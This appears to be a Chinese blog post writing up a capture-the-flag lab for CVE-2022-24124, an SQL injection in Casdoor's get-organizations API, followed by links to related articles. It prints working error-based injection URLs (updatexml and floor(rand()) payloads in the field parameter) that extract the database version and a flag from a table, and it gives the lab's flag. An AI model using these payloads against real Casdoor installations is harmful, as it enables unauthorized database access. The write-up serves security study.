春秋云镜 CVE-2022-24124

最新推荐文章于 2024-07-18 11:47:07 发布
最新推荐文章于 2024-07-18 11:47:07 发布
阅读量235 收藏
点赞数
分类专栏: 靶场 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22002773/article/details/131623725
版权

春秋云镜 CVE-2022-24124 Casdoor api 获取组织 SQL注入

靶标介绍

Casdoor是开源的一个身份和访问管理(IAM)/单点登录(SSO)平台,标记支持OAuth 2.0 / OIDC和SAML身份验证的Web UI。 Casdoor 1.13.1之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。

启动场景

在这里插入图片描述

漏洞利用

网上poc,获取版本号

/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,version(),null)

在这里插入图片描述
获取user()失败,仅支持常量 XPATH 查询

/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,user(),null)

在这里插入图片描述
该漏洞可以通过注入 XPATH 函数来利用。字段参数内的 UpdateXML() 或 ExtractValue() 用于生成错误并获取查询输出。
MySQL 中的 UpdateXML 函数包含三个参数UpdateXML(xml_target, xpath_expr, new_xml),
第一个参数:XML_Document是string的格式,为XML文档的对象的名称;
第二个参数:XPath_string是路径,Xpath格式的字符串;
第三个参数:new_value,string格式,替换查找到的符号条件的数据。
通过“12-MariaDB-0+deb11u1”可以看出当Xpath路径语法错误时,就会报错,报错回显就是版本号,但是输出被截断并在回显中只显示部分字符。因此需要使用substring()来绕过。
poc

http://eci-2ze91hjzahykhzm1560l.cloudeci1.ichunqiu.com:8000/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=(select 1 from (select count(*), concat((select concat(‘,’,id,flag) from casdoor.flag limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

在这里插入图片描述
得到flag

flag{3ad2fd81-0d89-4bcc-b00c-b1c2708d8821}

isbug0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
春秋云境:CVE-2022-24124
一只爱吃橙子的羊
12-02 2477
Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。
Casdoor get-organizations SQL注入漏洞 CVE-2022-24124
weixin_46801402的博客
11-02 1036
Casdoor get-organizations SQL注入漏洞 CVE-2022-24124
Casdoor SQL注入漏洞复现,编号:CVE-2022-24124
08-31 2507
此漏洞属于Sql注入漏洞,在查询API 存在与字段和值参数相关的SQL 注入漏洞,如api/get-organizations 所示。
春秋云境:CVE-2022-24124Casdoor api get-oraganizations SQL注入
m0_65712192的博客
07-23 1041
Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。
casdoor SQL注入CVE-2022-24124
最新发布
qq_23003811的博客
07-18 133
Casdoor 是一个基于 OAuth 2.0 / OIDC 的 UI 优先集中认证 / 单点登录 (SSO) 平台,简单点说,就是 Casdoor 可以帮你解决 用户管理 的难题,你无需开发用户登录注册等与用户鉴权相关的一系列功能,只需几个步骤,简单配置,与你的主应用配合,便可完全托管你的用户模块,简单省心,功能强大。Casdoor 1.13.1 之前的查询API 存在与字段和值参数相关的SQL 注入漏洞,如api/get-organizations 所示。2、使用sqlmap跑注入点。
CVE-2022-24124复现
giaogiaogioao的博客
11-26 788
CVE-2022-24124复现
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞:CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
春秋云境】CVE-2022-24124复现
小高工作室
12-01 1088
【代码】【春秋云境】CVE-2022-24124复现。
春秋云镜CVE-2022-24124 Casdoor api get-oraganizations SQL注入漏洞 解题思路
Dark-Specter的博客
12-19 969
报错注入的原理是利用应用程序在处理用户输入时存在漏洞,攻击者通过巧妙构造的恶意输入,触发应用程序执行包含SQL查询的操作,并故意引发数据库系统的错误,以从错误消息中获取敏感信息。:应用程序通常允许用户在表单字段、URL参数或其他输入方式中提供数据,这些数据将用于构建SQL查询。如果应用程序未正确验证和处理用户输入,就有可能存在漏洞。:攻击者利用这个漏洞,构造恶意输入,将恶意SQL代码插入到用户输入中,这个恶意SQL代码将成为应用程序生成的SQL查询的一部分。:攻击者的恶意输入旨在触发SQL查询中的错误。
sql注入合集
Aiwin的博客
05-08 905
sql注入合集,持续收集。
春秋云镜CVE-2022-25488(SQL报错注入)
m0_65712192的博客
04-21 1047
Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面
Django SQL注入漏洞 CVE-2022-28347
蚁景网安学院
05-18 943
漏洞简介在Django 2.2 的 2.2.28 之前版本、3.2 的 3.2.13 之前版本和 4.0 的 4.0.4 之前版本中的 QuerySet.deexplain() 中发现了SQL注入问题。这是通过传递一个精心编制的字典(带有字典扩展)作为**options参数来实现的,并将注入负载放置在选项名称中。影响版本2.2 =< Django < 2.2.283.2 =< D...
春秋云境】CVE-2022-28512
m0_49025459的博客
05-06 256
Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。
CVE-2022-2414】Dogtag_PKI XML实体注入漏洞复现
weixin_37771454的博客
11-29 663
Dogtag PKI XXE漏洞复现 CVE-2022-2414
春秋云镜(二)
wanan的博客
02-19 424
春秋云镜(二)
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值